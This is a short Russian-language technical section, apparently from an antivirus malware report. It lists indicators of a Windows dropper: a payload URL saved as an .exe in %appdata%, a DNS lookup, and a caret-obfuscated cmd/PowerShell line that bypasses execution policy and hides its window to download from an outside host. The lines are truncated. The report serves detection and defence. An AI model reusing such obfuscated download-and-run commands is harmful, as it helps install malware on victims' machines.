Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOW^e^rsHEll.Exe^ -^e^xeC^uTionP^OlIC^y B^yp^asS -n^o^PrO^f^iLE^ -wInD^owstY^l^e ^h^id^DE^n^ (NEw-oBJecT ^S^YSTE^m^.^nE^T.w^eb^cL^IEnt^).doW^N^load^FI^lE('http://www.zoerpoled.top...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /c "pOW^e^rsHEll.Exe^ -^e^xeC^uTionP^OlIC^y B^yp^asS -n^o^PrO^f^iLE^ -wInD^owstY^l^e ^h^id^DE^n^ (NEw-oBJecT ^S^YSTE^m^.^nE^T.w^eb^cL^IEnt^).doW^N^load^FI^lE('http://www.zoerpoled.top...' (со скрытым окном)